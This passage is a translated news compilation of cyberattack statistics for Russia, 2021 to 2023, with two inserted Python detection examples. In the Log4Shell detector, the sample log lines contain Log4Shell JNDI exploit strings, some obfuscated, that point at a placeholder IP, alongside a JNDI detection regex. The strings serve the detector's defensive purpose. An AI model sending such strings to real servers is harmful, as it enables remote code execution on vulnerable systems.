2023/08/29 11:37:35

The number of cyber attacks in Russia and in the world


The number of cybercrimes in Russia

Main article: The number of cybercrimes in Russia

2023

The number of cyber attacks on Russian IT companies has grown 4 times

The number of cyber attacks on Russian IT companies in the second quarter of 2023 increased 4 times compared to the same period in 2022 and reached 4 thousand. This was reported at the end of August 2023 in MTS RED.

Information security companies Positive Technologies and Kaspersky Lab confirmed to Kommersant the growing activity of hackers against the IT business in the Russian Federation. According to Positive Technologies estimates, the share of IT companies among all attacked organizations almost tripled, to 17%. Gazinformservice notes a 20-25% increase in attacks on IT companies, which hold a total market share of 10-15%. As noted by the Kaspersky Lab cybersecurity monitoring center, in Russia and the CIS the IT sector remains among the top three industries most attacked by hackers.


According to Artem Izbaenkov, director of cybersecurity development at EdgeЦентр (cloud solutions), attacks on IT companies are aimed primarily at paralyzing the network infrastructure, which can lead to serious disruptions in a company's operations, loss of its client base and a complete shutdown. Cyber attacks can also be used "to achieve geopolitical goals and manipulate public opinion," the expert said.

The vulnerability of Russian companies to hackers is associated with a lack of IT specialists in the market to ensure full protection, import substitution of significant systems and the transition to OpenSource (open source) products, believes Dmitry Ovchinnikov, chief specialist of the integrated information protection systems department at Gazinformservice.

"Before the accounts of Russian developers were blocked on foreign repositories, many IT companies actively used their developments, but now foreign open source products in Russia are not updated, which has led to an increase in vulnerabilities in the infrastructure of organizations," he said.[1]

The number of cyber attacks in the first half of the year approximately doubled

MTS RED on July 21, 2023 announced that the number of cyber attacks in the first half of 2023 approximately doubled compared to the same period in 2022. At the same time, the number of incidents critical in terms of consequences for business decreased by about 20%. According to the MTS RED study, their share in the total volume of cyber attacks was 22%, while in the first half of 2022 there were slightly less than half of such incidents - 46%. Thus, on average in Russia, the number of attacks continues to grow, and their level is decreasing. However, in a number of industries, MTS RED analysts record the opposite situation.

As in 2022, the most attacked industries in the first half of the year were information technology (35%), industry (21%) and retail (15%). According to statistics from the MTS SOC Cyber Attack Monitoring and Response Center, they experienced from 500 to 1,000 malicious cyber impacts of varying complexity every month. The largest number of incidents in these industries was due to attempts by cybercriminals to bypass the organizations' protective measures (37%). In second place, with shares of about 15% each, were violations of information security policies by employees, malware infections and attempts to hack user accounts.

"In early 2022, simple and aggressive attacks on the external IT perimeter of organizations, as well as phishing emails to company employees, prevailed. In 2023, the total number of significant attacks decreased, as companies began to pay more attention to cybersecurity, closing critical vulnerabilities in information systems or using overlay security tools and cybersecurity services," commented Andrei Dugin, director of the MTS RED cybersecurity services center, on the results of the study.

In addition, retail and industrial enterprises were subjected to the largest number of highly critical attacks. The share of retail in the total number of such incidents was 27%, about 40% of all attacks on this industry were critical. Analysts attribute this to the high level of digitalization in this area and the dependence of key retail business processes on the normal functioning of IT systems. As a result, retail companies are more vulnerable to cyber threats - in terms of possible damage to them, a larger number of different types of attacks are critical.

Banks and telecom have been exposed to malicious cyber activity less often than other industries. If in the first half of 2022 they took 3rd and 4th place in the list of the most attacked, then in 2023 they accounted for a total of no more than 10% of attacks. However, these industries were more likely than many others to be targeted by professional malefactors.

81% of all information security incidents recorded in telecom companies were recognized as highly critical. Compared to the first half of 2022, their number has approximately doubled. The share of such attacks in banks is 27%, the financial sector ranks third in this indicator.

Media and organizations working in the services sector took a small share of the total volume of attacks, 11% and 7% respectively. However, overall they were attacked more than five times as often as in 2022.

FSB information security center records more than 170 cyber attacks on Russia every day

More than 170 complex computer attacks on Russian information resources are recorded daily, said Nikolai Murashov, deputy director of the National Coordination Center for Computer Incidents (NCCCI), on May 25, 2023.

"In connection with the special operation against the Russian Federation, an unprecedented struggle is being waged on the Internet," he says. "The attacks are carried out from various points of the globe and are clearly coordinated. On an ongoing basis, state-authorized bodies monitor more than 35,000 information resources."


According to Murashov, the NCCCI is the body authorized to inform foreign partners about computer incidents and to receive such information from abroad. In 2023, at the center's request, the activities of more than 7,100 malicious resources were terminated, and more than 6,500 domain names ceased to exist, the deputy head of the National Coordination Center for Computer Incidents said.

"There is an increase in the speed at which threats are implemented: from the moment information about a threat appears, for example the publication of information about a vulnerability, to its practical implementation takes no more than a few hours," Murashov said in February 2023.

As NCCCI specialists have established, hackers agitate for cyberattacks through Telegram channels, distributing the necessary tools and instructions for them.

Cyber attacks against Russia are carried out from different countries, but they are mainly traced to the USA, NATO countries and Ukraine, said Andrei Krutskikh, special representative of the President of the Russian Federation for international cooperation in the field of information security and director of the department of international information security of the Ministry of Foreign Affairs, in February 2023.[2]

2022

The total number of cyber attacks increased by 21% over the year

Positive Technologies specialists analyzed the current cyber threats of 2022. The total number of incidents increased by 21% compared to 2021. The main trends were an increase in the number of incidents involving web resources, the emergence of wipers, and an increase in the cross-industry consequences of attacks on IT companies. The company announced this on March 29, 2023.

Among organizations, state institutions (17%), medical institutions (9%) and industry (9%) were most often victims of attacks. In most of these cases, attackers used malware (54%), social engineering (43%) and exploited vulnerabilities (34%).

The share of successful attacks aimed at web resources of organizations has increased. If in 2021 official sites were compromised in 17% of cases, then in 2022 the share of such incidents was 22%. The greatest blow fell on government agencies: the number of incidents related to attacks on web resources more than doubled, and their share increased from 23% to 41%. We expect such attacks to continue in 2023. They pose a particular danger to companies providing online services and providing the possibility of online payment: attackers can embed malicious code into sites to intercept personal and payment data.

Ransomware remains the most popular type of malware among attackers. In 2022, criminals used ransomware in every second successful attack on organizations (51%). The most common consequences of such incidents were disruption of core activities (79%) and sensitive data leaks (55%). In 12% of incidents, companies suffered direct financial losses. Many groups rewrote the malware they use in cross-platform programming languages and created versions targeting both Windows and Linux systems. The spread of data-destroying malware (wipers) is becoming a trend: the number of incidents using wipers increased by 175% compared to 2021.

In 2022, the interest of cybercriminals in cryptocurrency increased significantly. The number of successful attacks on blockchain projects has more than doubled compared to 2021. In 78% of incidents, attackers managed to steal funds, with damage in some cases amounting to several hundred million dollars. Private users became victims of social engineering attacks: attackers spread messages on social networks and instant messengers about the free distribution of tokens and NFTs, and also offered to transfer funds, promising to return much more assets than was invested. Positive Technologies analysts believe that in 2023, the number of cases of fraud directed at holders of cryptocurrency assets will increase.

Social engineering is still going strong. In successful attacks on organizations the share of this method is 43%, and in attacks on individuals 93%. Attackers actively used the phishing-as-a-service model. In addition, even low-skilled cybercriminals could carry out large-scale attacks: ready-made phishing kits helped them in this.

The year passed under the sign of mass leaks: during the entire period, Positive Technologies experts recorded reports of data compromise. Most often, medical institutions became the source of leaks: in 82% of incidents, attackers managed to steal confidential information, mainly these were personal data of clients of medical institutions. In organizations engaged in scientific research or providing educational services, this figure was 67%, and in retail - 65%. Coupled with massive leaks, attacks aimed at bypassing multifactor authentication are gaining popularity. This could lead to an increase in the number of incidents in 2023.

In 2022, the number of incidents in which spyware was used grew constantly. As a result, this figure reached 43% in attacks on individuals. Most often, attackers distributed spyware through phishing sites (42%) and email (20%).

The number of successful attacks directed at IT companies gradually grew, and in the IV quarter of 2022 their number almost doubled the indicators of the I quarter. Most often, incidents led to leaks of confidential information (63%), violation of core activities (35%), the use of company resources to carry out attacks (13%). Such large organizations as Globant, Microsoft, Nvidia, Samsung became victims of attackers. Attacks on IT companies had intersectoral consequences: both by subsequent hacking of customer infrastructure and by violating customer business processes. For example, people could not receive a number of services from medical and government agencies due to an attack on an IT solution provider.

"We expect the number of attacks targeting IT companies to continue to grow in 2023. This can affect the clients of such organizations, as well as lead to unacceptable consequences for other industries," said Ekaterina Semykina, an analyst at the Positive Technologies research group. "IT solution developers need to verify unacceptable events. We strongly recommend that you regularly analyze code for security and check third-party open source libraries used in development."

The number of cyber attacks by financially motivated hackers in Russia has tripled over the year

On March 17, 2023, Group-IB announced that it had studied the high-tech crimes of 2022 based on incident responses conducted in Russian companies. According to the study, in 2022 the number of cyber attacks by financially motivated hackers almost tripled compared to 2021. The most common type of cyber threat encountered by experts from the Group-IB Forensic Laboratory during incident response was ransomware attacks, which accounted for 68% of all incidents. Read more here.

The number of cyber attacks on Russian companies has doubled and reached 911 thousand.

In 2022, 911 thousand hacker attacks were carried out on Russian companies, twice as many as a year earlier. Rostelecom-Solar published this data on February 20, 2023.

The study of experts covers 280 organizations from various industries, including the public sector, finance, power, telecom, media, and large retail. This statistic does not include massive DDoS attacks.


According to information security specialists, against the background of the general growth of attacks in the second half of the year, their number decreased from hacktivists - unprofessional hackers acting for political rather than commercial reasons using simple tools, for example, massive DDoS attacks or attacks on web servers. For example, if in the first half of the year the share of hacktivist attacks on web servers in Russia was 11% of all incidents, then in the second half of 2022 - only 1%.

"If we talk about 2022 as a whole, it began with massive 'carpet bombing' in cyberspace; Russian companies had not encountered such a thing before (in fact, no one in the world had). The attacks were chaotic, aimed at absolutely any industry and organization. The goal of the attackers was Russian infrastructure in principle. But by the middle of the year, mass attacks retreated and were replaced by more targeted attacks," said Daria Koshkina, head of cyber threat analytics at Rostelecom-Solar.

The study says that by the end of 2022 the number of network attacks in Russia had increased. Perimeter or web scanning and attempts to compromise accounts are often carried out by automated tools that hackers use to reconnoiter the target. Despite the low criticality of such incidents, they are a warning sign for companies, indicating that they are attractive to attackers. This means they need to continue strengthening their cyber defense, Rostelecom-Solar said.[3]

Cyber attacks on IT companies through spyware have increased

The number of cyber attacks on Russian IT companies in the fourth quarter of 2022 increased by 18% compared to the previous three months. At the same time, in 62% of cases, hackers used malicious software, mainly ransomware programs aimed at stealing confidential information and obtaining a ransom. This is stated in a study that Positive Technologies published on February 17, 2023.

Experts noted the share of spyware attacks: in October-December 2022, 17% of attacks on organizations and 49% of attacks on individuals involved spyware, which is 5 pp and 3 pp more, respectively, than in the third quarter of 2022. Attackers create new malware and work to expand its functionality: for example, the new Aurora stealer can steal data not only from browsers or the clipboard, but also directly from the device's disk.


The spread of spyware under the "malware as a service" scheme allows even inexperienced attackers to use it: Positive Technologies researchers analyzed the new BlueFox stealer, which is actively promoted under this scheme on the underground market. In addition, cases of embedding malicious code with spyware functions into Python developer packages have become more frequent. This can lead to an increase in the number of supply chain attacks (attacks in which attackers compromise a company through its software or hardware vendors, for example by injecting malicious code into a product's source code or distributing malicious updates to infect the target organization's infrastructure) and in compromises of IT networks.[4]

The number of cyber attacks on the Russian public sector has grown several times

In 2022, the number of attacks on the Russian public sector approximately doubled or tripled compared to a year earlier. Shamil Chich, an analyst at the IZ:SOC cybersecurity monitoring center of Informzaschita, told Vedomosti this (the article was published on January 16, 2023).

A multiple increase in the number of attacks on government agencies since February 2022 was confirmed to the newspaper by Alexei Pavlov, Business Development Director of the Solar JSOC Cyber Attack Counteraction Center of RTK-Solar. As Shamil Chich noted, in connection with the political situation, so-called hacktivists were added to the hackers, recruited en masse in social networks and Telegram channels. Their activity was aimed mainly at government agencies and significantly increased the number of attacks, he continued. The main vectors were DDoS and web attacks on the public resources of government agencies, Pavlov added. The goal of the attackers, according to him, is to create additional tension in society through defacements (replacing one web page with another that publishes a message from the hackers), the inaccessibility of resources significant to the population and user data leaks.


Roskomnadzor (RKN) is responsible for the cybersecurity of the Russian segment of the Internet. The agency filters malicious traffic, preventing DDoS attacks on all Russian Internet resources. RKN told the publication that, with the help of technical means for countering threats at cross-border communication nodes, "thousands" of attacks on the information resources of federal and regional authorities, the public services portal and other resources were repelled.

According to SearchInform, in 2022 26% of government agencies increased their information security budget, 52% kept it unchanged, and 12% reported a decrease. The funds went to extending licenses and to purchasing hardware and software.[5]

For the year, the number of recorded attacks on the public sector amounted to 403 attacks

Positive Technologies experts highlighted the main events in the field of cybersecurity for 2022 and gave a forecast of what threats should be expected in 2023. Representatives of Positive Technologies shared information about this on January 13, 2023. Experts' assessments are based on global data, the company's own expertise, the results of investigations, as well as on data from authoritative sources.

Cyberattacks. Illustration: ru.slovoidilo.ua.

In 2022, all key sectors of the economy attracted the attention of cybercriminals. Thus, Positive Technologies experts note the following:

  • The public sector was the No. 1 target. In the first quarter of 2022, the number of attacks aimed at government agencies almost doubled compared to the last quarter of 2021, and then continued to grow throughout the year. Government agencies faced the largest number of cyber attacks among organizations: their share of the total number of attacks was 17%, 2 pp more than in 2021. In total, 403 attacks were recorded in 2022, 25% more than in 2021. The public sector was the target of many criminal groups (both ransomware and APT groups), including Cloud Atlas, Tonto, Gamaredon, MuddyWater and Mustang Panda. Attackers used malware in almost every second attack on government agencies. The most popular types of malware were ransomware (56% of malware attacks) and remote-control malware (29%).
  • Industry - Hackers seek to stop technological processes. In 2022, almost every tenth attack on organizations occurred in industrial enterprises. In total, 223 attacks on industrial companies were recorded over the year, which is 7% more compared to 2021. The main blow to industry fell on the second quarter, when the total number of attacks on organizations in the industrial sector increased by 53% due to the increased activity of ransomware.

"Almost half of the attacks used social engineering, and in 41% of cases attackers exploited vulnerabilities in software. Most of the attacks (71%) used malware, which was distributed mainly through compromised resources on the perimeter of organizations (49%) and e-mail (43%). For the third year in a row, we have noted a decrease in the share of social engineering and an increase in the share of exploitation of protection deficiencies on perimeter resources," commented Dmitry Darensky, Head of Industrial Cybersecurity Practice, Positive Technologies.

  • Medicine is the leader in data breaches. For the fifth year in a row, medical institutions have remained in the top three most attacked industries: in 2022, the share of attacks on them was 9% among all organizations, and the number of attacks is approximately at the level of 2021. Medical institutions most often became a source of data leaks among organizations. In more than 80% of cases, attacks led to leaks of customer data (mainly personal data and medical information). The systems of medical institutions contain large amounts of data, and usually criminals can receive a full name, date of birth, physical address, phone number, account details and card numbers, insurance information, driver's license number, email address, medical history, health data and other medical information.
  • The financial sector is the best prepared for attacks, but overall its level of protection is insufficient. At the end of 2022, the total number of attacks on financial organizations decreased by 7% compared to the same period in 2021. The share of attacks on the financial industry has generally decreased in recent years and in 2022 was about 4% of all attacks on organizations. Although the financial sector is better prepared for attacks than other companies, overall its level of protection against internal and external attackers remains not high enough. Among the financial organizations studied from 2021 to 2022 as part of external pentests, Positive Technologies experts managed to gain access to the local network in 86% of cases, and in half of these companies, in the event of a real attack, even an attacker without a high degree of training could penetrate the internal network. In internal pentests, experts managed to gain full control over the infrastructure in all cases, and also demonstrated the possibility of gaining access to critical systems: for example, a vulnerability was identified in one bank that allowed compromising more than 1,000 ATMs. As a rule, when verification goes beyond the limited scope of work, more than 70% of the identified events can be realized.
  • IT companies: caution in the use of open source software and control of supply chains. The number of attacks on IT companies in 2022 decreased slightly compared to 2021, but they still account for 6% of attacks on organizations. During the year, the company observed major attacks aimed at IT companies. For example, in February 2022 Lapsus$ attacked the American graphics processor developer Nvidia, and in early March 2022 Samsung came under attack, with Samsung Galaxy source code stolen. In addition, companies such as Okta, Microsoft, Cisco, AMD, Cloudflare, Twilio and LastPass were hacked. Social engineering, credential compromise and exploitation of vulnerabilities on the perimeter were used in attacks on IT companies with almost the same frequency. Ransomware was seen in every third case.
  • Science and education are under attack from ransomware. Institutions from the field of science and education are among the top 5 most frequently attacked organizations. The number of attacks on them is comparable to the results of 2021. In more than half of the cases, attackers were able to steal confidential information, mainly personal data of users. In every second attack, ransomware was used, and the main goal of the criminals was to obtain a ransom from an educational institution. In 59% of cases, attackers resorted to social engineering methods against employees, and in 25% of attacks, organizations selected credentials or used compromised passwords to access resources. In every fifth attack, attackers exploited vulnerabilities in the software. In 2022, the share of attacks on web resources increased: from 11% to 20%.
  • Users: large-scale data breaches. The number of attacks on individuals increased by 44%. Ordinary users accounted for 17% of all attacks. Traditionally, the main attack vector is social engineering in its various forms, used in 93% of cases. To carry out such attacks, attackers created phishing sites (56%), sent malicious letters by e-mail (39%), and searched for victims in social networks (21%) and messengers (18%).

In 2023, Positive Technologies experts predict:

  • The rise of hacktivism aimed at state institutions. It can lead to negative consequences, from defacing sites to destroying infrastructure.
  • Attacks on medical institutions and their clients: theft of confidential data, phishing attacks on patients, pressure from ransomware, incidents aimed at hacking services and applications used to provide remote medical services.
  • A changing threat landscape for industry: the goals of criminals will often not be financial gain or large ransoms, but interruptions in the activities of enterprises, accidents, and the shutdown of critical technological processes. There are also positive trends: information security is coming to be understood as a tool for ensuring resilience, projects for the modernization and construction of production facilities already include cybersecurity solutions, with I&C systems delivered by suppliers protected by default, "non-invasiveness" is a thing of the past, and industry regulation and competence centers are developing. The industry is moving towards the practical protection of its assets, and interest in comprehensive protection tools, which primarily solve the applied security tasks of enterprises, is naturally growing.
  • The emergence of clones of online banks and attacks on financial companies through integrable systems.

"In order not to encounter clones of online banks, you need to monitor and search for them, and for phishing sites (mobile applications) of financial companies, both manually and automatically. Against attacks through integrable systems, Positive Technologies experts recommend analyzing the security of all related systems, developing internal security teams, creating conditions for prompt incident response, and limiting access that is not required for the operation of an integrable system," said Maxim Kostikov, Head of Application Security Analysis, Positive Technologies.

  • The growth of attacks on cloud service providers, the continuation of attacks on software and service supply chains, the need for IT companies to monitor the security of specialized environments intended for development, as well as used open source libraries.
  • The development of attacks on online learning services, the continuation of ransomware attacks on the field of science and education, and attackers will pursue different goals: theft of research developments, personal and user credentials.
  • Improving attack schemes on users using social engineering. In 2022, users became victims of large-scale data leaks. This will allow attackers to improve attack schemes using social engineering: criminals will be able to carry out attacks more pointwise, having detailed information about the actions of the victim in compromised services. Due to the distribution of ready-made kits for conducting mass phishing attacks, the activity of attackers against individuals will significantly increase, especially against customers of online banks and other online services. Experts also predict an increase in the number of attacks on users on social networks and instant messengers, as well as an increase in the number of attacks on the second authentication factor, which is used by users to log into many services.

"Guided by the principles of effective security, we recommend focusing on protecting against those threats that will lead to unacceptable events. Given the forecasts, first of all this is disruption of key technological and business processes, leakage of confidential user data, and the possibility of developing an attack on the company's customers. The prevention of such events largely depends on timely detection of and response to threats, and this requires the constant development of your own security teams or the involvement of external information security specialists, monitoring of information security events, especially for critical systems, and proactive threat hunting to prevent attackers from remaining in corporate systems for long. It is crucial to have reliable backup tools and a fine-tuned recovery process that will allow the organization to resume its main activities as soon as possible in the event of an attack. Sharing information security experience with other companies in your industry will increase its overall security, but you should also think about the cross-industry consequences of attacks and their prevention," comments Fyodor Chunizhekov, Research Group Analyst, Information Security Analytics Department, Positive Technologies.

Russian Foreign Ministry: The number of cyber attacks on Russia increased by 80%

At the end of December 2022, the Ministry of Foreign Affairs (MFA) of the Russian Federation spoke about the surge in cyber attacks on Russia. The largest number of hacker attacks are directed at the public sector, said Oleg Syromolotov, deputy head of the department.

"Against the background of the special military operation, our country faced unprecedented external aggression in the information space. In 2022, the number of cyber attacks on Russia increased by 80%," he said in an interview with RIA Novosti.


According to him, in 2021, the main goal of cyber attacks was financial institutions, but in 2022 they became state organizations, including critical information infrastructure facilities and socially significant institutions.

According to the Deputy Foreign Minister of the Russian Federation, the overwhelming majority of cyber attacks against Russia are carried out from the territory of NATO, EU, as well as Ukraine. He stressed that Ukraine has turned into a bridgehead for the West to test cyber developments against Russia.

An illustrative example: after Ukrainian call centers were neutralized in the course of the special military operation, the number of fraudulent calls to Russian citizens decreased fivefold, Syromolotov said.

On December 10, 2022, Syromolotov said that the United States plans to spend more than $11 billion in 2023 on cyber attacks against governments it considers objectionable.

In December 2022, Politico wrote that NATO countries intend to use cyber forces and the latest technologies in the Ukrainian conflict to counter Russia. The article notes that new technologies have been tested in the conflict, including adapted uses of artificial intelligence.

On October 24, 2022, Deputy Prime Minister Dmitry Chernyshenko said that a "cyber war of unfriendly countries" was being waged against the country. In this regard, cyber headquarters were set up in all executive bodies and across critical infrastructure.[6]

The number of cyber attacks on automated control systems in Russia soared by 80%

On September 20, 2022, Kaspersky Lab experts published a study in which they reported an increase in the number of targeted cyber attacks on industrial enterprises in Russia. Most often, malicious objects penetrate computers of automated control systems (ACS) from the Internet. Read more here.

2021

Record number of zero-day threats revealed over the year

On April 28, 2022, CROC announced the results of its study of zero-day threats. In 2021, a record number of zero-day threats were identified: 57, twice as many as in 2020 and more than in any other year on record. According to CROC, the total number of cyber attacks increased by 23%. At the same time, targeted cyber attacks are growing and account for about 75% of the total. Most of them are carried out using malware (73%), among which zero-day threats pose a particular danger.

In 2021, a record number of zero-day threats were identified. Photo: securelist.ru.

According to the company, a zero-day exploit (or zero-day) is a cyber attack aimed at a software vulnerability that is unknown to the vendor and to antivirus programs. The attacker finds the vulnerability before the vendor does, quickly builds an exploit and uses it to break in. Because no patch or signature exists yet, such attacks have a high chance of success, which makes zero-day vulnerabilities a major security threat.

Zero-day threat count by year (chart)
Of course, as of April 2022 hackers are exploiting unknown vulnerabilities to interfere with systems. The goals vary: industrial espionage, theft of data and money from accounts, infecting networks with ransomware and extorting a ransom, political activism and cyber terrorism,

noted Dmitry Starikovich, leading information security expert at the IT company CROC

The number of threats correlates directly with the amount of software being developed. Software changes constantly, new products appear, and they can still contain old bugs. A striking example is the Log4j vulnerability in the Java logging library: the library was used in a large number of IT products installed in almost every company, and suddenly many servers around the world became vulnerable to remote execution of malicious code.
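The Log4j case comes up again further down this page in the Positive Technologies, Tet and Check Point reports. The following is an added example, not code from CROC or any other source on the page, showing the detection side of it: a small Python detector that folds the nested ${...} lookups attackers use to hide the jndi: trigger the way the vulnerable library would, then checks the result against a JNDI pattern. The log lines it runs over are constructed, and the lookups it folds (lower, upper and :- defaults) are the common obfuscation subset, not the full Log4j lookup language.

```python
"""Detect attempted exploitation of CVE-2021-44228 (Log4Shell) in log lines.

Added illustrative example; not code from CROC or from this page. The sample
log lines below are constructed, not real traffic.

Log4j 2.x resolves ${...} lookups recursively, so attackers hide the "jndi:"
trigger behind nested lookups such as ${${lower:j}ndi:...} or ${::-j}ndi.
The detector folds those lookups before checking for a JNDI lookup.
"""
import re
from typing import List, Tuple

# Innermost lookup (no nested ${ inside). Matches ${name:arg} or ${:-default}.
_INNER = re.compile(r"\$\{([^${}]*)\}")

def _fold_one(body: str) -> str:
    """Resolve one innermost lookup for the common obfuscation tricks:
    ':-' defaults and the case-conversion lookups. Unknown lookups
    (env, sys, date, ...) cannot be resolved offline and are kept as text."""
    if ":-" in body:                       # ${...:-default} -> default
        return body.rsplit(":-", 1)[1]
    key, sep, arg = body.partition(":")
    key = key.lower()
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    return body

def normalize(s: str, max_rounds: int = 20) -> str:
    """Repeatedly fold innermost ${...} lookups until nothing changes or the
    round limit is hit (bounded so hostile input cannot loop forever)."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _fold_one(m.group(1)), s)
        if new == s:
            break
        s = new
    return s

_JNDI = re.compile(r"jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nis|nds)\s*:", re.I)

def is_log4shell_probe(line: str) -> bool:
    """True if the raw line or its folded form contains a JNDI lookup trigger."""
    return bool(_JNDI.search(line)) or bool(_JNDI.search(normalize(line)))

def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (index, folded_line) for every line that looks like a probe."""
    return [(i, normalize(line)) for i, line in enumerate(lines)
            if is_log4shell_probe(line)]

# Constructed web-server access log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.23/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.23/y}"',
    '10.0.0.11 - - "GET /?q=${env:HOME} HTTP/1.1" 200 "curl/7.68"',
]

if __name__ == "__main__":
    for idx, folded in scan(SAMPLE_LOG):
        print(f"line {idx}: {folded}")
```

The point of folding first is that a plain substring match on "jndi:" misses the last two probes while still producing false positives on any line that happens to contain the word; matching the folded form against the scheme list catches the obfuscated variants and ignores harmless lookups such as ${env:HOME}.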

Despite the sharp increase in the number of zero-day threats, finding them takes attackers more and more time. Modern security systems and the complexity of IT infrastructures mean that hackers have to do much more work than five years ago,

said Dmitry Starikovich, leading information security expert at the IT company CROC

As for the goals of cybercriminals, every third attack hunts for personal data (33%). Rounding out the top three are information constituting a trade secret (21%) and user credentials (19%).

Targets of cybercriminals (chart)

Zero-day attacks can use various vulnerable objects: operating systems, web browsers, office applications, open source components, hardware and the Internet of Things.

Operating systems are perhaps the most attractive target for zero-day attacks (as of April 2022) because of their ubiquity and the control over user systems they give an attacker.

Web browsers: an unpatched vulnerability could allow attackers to download files, run scripts or even execute binaries on users' computers.

Office applications: malware embedded in documents or other files often exploits zero-day vulnerabilities in the application used to open and edit them.

Open source components: some open source projects are not actively maintained or lack sound security practices. Software vendors can use these components without knowing about the vulnerabilities they contain.

Hardware: a vulnerability in a router, switch, network device or home device such as a game console can allow attackers to compromise these devices, disrupt them or use them to build massive botnets.

The Internet of Things (IoT) is connected devices, from household appliances and televisions to sensors and connected cars. Many IoT devices have no mechanism for patching or updating their software.

The price of zero-day exploits varies greatly and reaches $2,500,000, and that is only the bounty paid to ethical researchers for reporting a flaw so that a corresponding update can be released. According to publicly available data, the price of some vulnerabilities has increased by 1150% since 2016.

The amount paid for an original zero-day exploit depends on the popularity and security level of the affected software or system, as well as the quality of the exploit offered (full or partial chain, supported versions, systems and architectures). The most valuable are vulnerabilities for hacking mobile devices, with Android exploits valued considerably higher.

Among desktop and server software, vulnerabilities in Windows, Chrome, Apache and MS IIS are of the greatest interest to hackers; their price can reach a million dollars. macOS vulnerabilities are valued several times lower (about $100 thousand).

At the same time, many criminals look for vulnerabilities and sell them to hacker groups, which in turn use them and earn tens of times more. Losses from the well-known Carbanak attack were estimated at $1 billion. In Russia, more than 58 million rubles were stolen from PIR Bank with the help of this malware.

There are many high-profile cases. In 2021, Google Chrome was hit by a series of zero-day attacks that forced a number of Chrome updates; the problems stemmed from bugs in the V8 JavaScript engine used by the browser. A year earlier, a vulnerability was discovered in the popular video conferencing platform Zoom: it gave attackers remote access to the computers of users running older versions of the OS. Where the target was an administrator, attackers could take over the device and all its files completely.

The attacker's main task is to gain access to the network and elevated privileges. Here we are talking about software vulnerabilities, but you need to understand that a single vulnerability is not enough: you also need to reach the software that contains it. This is where social engineering comes to the "rescue." With such methods, attackers get the victim to open a malicious email with an attachment and follow an infected link. After that, the hacker's software lands on the computer and tries to exploit the vulnerability,

said Dmitry Starikovich, leading information security expert at the IT company CROC

Reliable detection of deviations from the expected behavior of a system can be an effective tool for preventing breaches. To achieve it, follow these recommendations:

  • Update applications and operating systems promptly. Vendors regularly release updates and security patches that fix previously identified flaws in the code.
  • Run only the systems you actually need. The more software a company uses, the more potential vulnerabilities it has.
  • Configure the firewall. Restricting traffic helps prevent unauthorized access and identify a threat at an early stage.
  • Develop cyber awareness. Social engineering is used to deliver and run exploits, so training employees to handle data safely in a web environment raises the level of security considerably.
  • Use antivirus software. Comprehensive solutions help secure enterprise systems and databases.

IT infrastructure events also need to be monitored with SIEM, EDR and NTA tools and a dedicated team of SOC analysts.

It would seem that these methods are already used in every company, but that is not the case. We had a case where we saved a customer from a zero-day threat because they had not updated their software on time. As a result, ransomware reached user workstations. We quickly took action and promptly cut the subnet with the infected machines off from the rest of the network, stopping the spread of the malware. Then came attempts to recover data and rebuild the workstations from scratch, as well as an analysis of what had happened: the introduction of a vulnerability management process, process monitoring on workstations (an EDR-class solution) and work on user cyber hygiene (security awareness),

added Dmitry Starikovich, leading information security expert at the IT company CROC

In addition, companies need to constantly monitor threats identified in the outside world. The source of such data can be a system integrator or vendor as well as open sources, for example NVD (National Vulnerability Database). This information is constantly updated and is useful as a guide, but zero-day exploits are by definition unknown, so there is a limit to what an existing database can report.

Machine learning is increasingly used here: based on previously recorded exploits and on current and past interactions of users with the system, a baseline of normal behavior is established, and deviations from it are flagged. The more data is available, the more reliable the detection.

Companies of all sizes need an incident response strategy that provides an organized process for detecting and eliminating cyber attacks. A specific plan focused on zero-day threats will give an advantage if they occur, optimize response time and increase the chances of avoiding or reducing damage.
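The baseline-and-deviation approach described above is the part of the recommendations that still works when there is no signature to match, so here it is as an added example (not CROC's code and not from the page): it learns which parent-to-child process chains, user-to-host logins and process-to-port connections are normal from past endpoint events, then scores new events by how many of those relations are new or rare. The events, the field names (user, host, parent, proc, dport) and the thresholds are constructed assumptions, not any product's schema.

```python
"""Baseline-and-deviation detection over endpoint process events.

Added illustrative example; not CROC's code and not from this page. Learns
what is normal from past events, then flags what deviates, which is what
catches an exploit that no signature knows yet. Records and field names are
constructed for the example and are not any product's schema.
"""
from collections import Counter, defaultdict
from typing import Dict, List, Set, Tuple

Event = Dict[str, object]

class Baseline:
    def __init__(self):
        self.parent_child: Counter = Counter()                 # (parent, proc) -> count
        self.user_hosts: Dict[str, Set[str]] = defaultdict(set)  # user -> hosts seen
        self.proc_ports: Dict[str, Set[int]] = defaultdict(set)  # proc -> ports seen

    def learn(self, events: List[Event]) -> "Baseline":
        """Record every relation seen in the training period."""
        for e in events:
            self.parent_child[(e["parent"], e["proc"])] += 1
            self.user_hosts[e["user"]].add(e["host"])
            if e.get("dport") is not None:
                self.proc_ports[e["proc"]].add(int(e["dport"]))
        return self

    def score(self, e: Event, min_support: int = 3) -> Tuple[int, List[str]]:
        """(score, reasons): one point per relation that is unseen or rare.
        min_support keeps a chain seen once or twice from counting as normal."""
        reasons = []
        pair = (e["parent"], e["proc"])
        if self.parent_child[pair] < min_support:
            reasons.append(f"rare process chain {pair[0]} -> {pair[1]}")
        if e["host"] not in self.user_hosts.get(e["user"], set()):
            reasons.append(f"user {e['user']} never seen on {e['host']}")
        dport = e.get("dport")
        if dport is not None and int(dport) not in self.proc_ports.get(e["proc"], set()):
            reasons.append(f"{e['proc']} never connected to port {dport}")
        return len(reasons), reasons

def detect(baseline: Baseline, events: List[Event],
           threshold: int = 2) -> List[Tuple[Event, List[str]]]:
    """Events whose deviation score reaches the threshold; a single new
    relation (a user on a new host) is left below it to limit noise."""
    hits = []
    for e in events:
        score, reasons = baseline.score(e)
        if score >= threshold:
            hits.append((e, reasons))
    return hits

def _ev(user, host, parent, proc, dport=None) -> Event:
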